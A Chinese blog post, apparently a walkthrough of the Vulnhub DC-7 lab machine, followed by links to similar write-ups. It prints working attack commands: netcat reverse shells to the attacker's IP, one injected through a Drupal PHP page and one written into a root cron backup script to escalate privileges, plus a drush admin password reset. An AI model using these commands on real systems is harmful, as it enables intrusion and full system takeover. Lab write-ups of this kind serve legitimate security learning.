渗透测试学习之靶机DC-7

最新推荐文章于 2024-04-22 01:25:32 发布
最新推荐文章于 2024-04-22 01:25:32 发布
阅读量395 收藏 2
点赞数 1
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44426869/article/details/104883470
版权
过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.144
在这里插入图片描述

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.144
    在这里插入图片描述
  • web站点相关服务信息
    开放了80http端口,访问一下:
    在这里插入图片描述
  • github信息
    根据首页的提示,不用去尝试暴力破解后台了,outside the box…
    看到左下角的Powered by Drupal下面还有个@DC7USER,DC-1也是这个CMS但是没有这个,拿着DC7USER去百度一下,大多数这个题的writeup,去必应,看到github,DC-7的源码???
    在这里插入图片描述
    在这里插入图片描述
    在config.php中看到数据库账号密码:
    在这里插入图片描述
    没有3306,没办法远程登录数据库…
3. ssh登录

在登陆页面(右上角的log in)和ssh尝试使用数据库的账号密码登录,只能连上ssh:
在这里插入图片描述
可以看到登上去就提示有邮件mail。
在当前目录下,看到mbox文件和backups目录,backups里website.sql.gpg 和website.tar.gz.gpg两个gpg文件,gpg是用来加密文件的:
在这里插入图片描述
查看mbox文件后,发现每个邮件都有backups.sh,查看一下
在这里插入图片描述
在这里插入图片描述
得出结论:每隔一段时间就执行这个文件,实现对数据库和站点代码进行备份加密,并删掉了原来的,只留下加密后的。
sh文件中使用了drush,可以使用其来更改用户密码(注意:需要进入/var/www/html目录下才可执行):
drush user-password admin --password="admin"修改admin的密码为admin
在这里插入图片描述

4. 后台登录

使用修改后的密码登录admin,然后在Manage下的Content,编辑首页在源文件增加php脚本,进行反弹shell,但是没有php这个选项…
在这里插入图片描述
在这里插入图片描述

参考文章
php模块链接:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
找到Manage下的Extend,点击Install new module:
在这里插入图片描述
在这里插入图片描述
点击Enable newly added modules,在里面找到PHP Filter,勾上:
在这里插入图片描述
然后拉到最下面Install:
在这里插入图片描述

5. 反弹shell

Manage -> Content -> edit:
<?php system('nc -e /bin/bash 192.168.246.138 8888')?>
在这里插入图片描述
保存后,138kali监听8888端口,然后访问其首页:
在这里插入图片描述
python返回交互式shell:
python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述

6. 提权

前面提到backups.sh会每隔一段时间执行一次进行备份,需要root权限才能进行的操作,可以在backups.sh中写入shell,反弹回来即为root权限:
echo "nc 192.168.246.138 6666 -e /bin/bash" > /opt/scripts/backups.sh
在这里插入图片描述
在kali上监听6666端口,等了一会之后就收到了:
返回交互式shell:
在这里插入图片描述
在这里插入图片描述

总结
wxlblh
关注
专栏目录
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1106
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC-7靶机渗透
m0_62008601的博客
06-02 1048
dc-7靶机的渗透过程
【渗透项目】靶机DC-7渗透过程
命运的旋律的博客
05-10 718
信息收集 主机发现 靶机测试常规起手式:) nmap -sn 192.168.72.0/24 -sn和-sP都是对主机进行ping扫描 端口扫描 nmap -Pn -T4 -A -v -p- 192.168.189.137 --script=vuln 网站指纹扫描 通过网站指纹扫描发现该网站的中间件使用了apache2.4.25,使用的CMS是Drupal 8 python3 cmseek.py -u 192.168.189.137 使用searchsploit和msfconsole也没
DC-7靶机渗透实战
0XAXSDD的博客
06-14 591
DC-7靶机 常规扫描一波: nmap -A 192.168.206.146 发现开放了ssh服务 cms用的Drupal 8 发现一些敏感目录,粗略看了一遍,没有什么可利用的 用了一下专门扫Drupl的工具 git clone https://github.com/droope/droopescan.git cd droopescan pip install -r requirements.txt ./droopescan scan --help 默认账户admin,版本8.7,没有什么可以gets
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
vulnhub渗透测试靶机DC-7
weixin_46128614的博客
01-19 486
下载地址:https://www.vulnhub.com/entry/dc-7,356/ nmap -sT -sV -p- -T5 192.168.49.21 我们进到80端口,作者提示我们不是爆破和字典攻击,让我们跳出box 在左下角留了一个用户,应该是Twitter的,老外都爱用Twitter 果然 我们把github上的内容下载下来,查看到了一个配置文件给到了一个账号和密码 dc7u...
DC-7靶机详细渗透步骤
wwxxss
11-04 696
DC7详细的渗透的步骤,它跳出了之前的思维,提供了我们还有源码泄露漏洞,希望大家能理解步骤
[网络安全学习篇75]:渗透测试实战-DC-7-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-25 1383
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
dc-7 靶机渗透学习
..
03-23 4018
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
DC-7靶机渗透测试
来日可期的博客
08-13 1130
.gpg 后缀的文件通常是使用 GNU Privacy Guard (GPG) 或类似的加密软件创建的加密文件。GPG 是一个开源的加密工具,用于确保数据的机密性和完整性。 .gpg 文件是经过加密的文件,其中包含了原始文件的内容,但使用了加密算法对其进行了保护。这些文件经过加密后,只能通过相应的私钥或密码进行解密,以还原到原始文件。
DC-7靶机渗透测试 (GPG,drush,mkfifo,nc提权)
single_g_l的博客
08-13 1400
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
VulnHub靶机 DC-7 打靶 渗透详细流程
最新发布
rumil的博客
04-22 1023
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值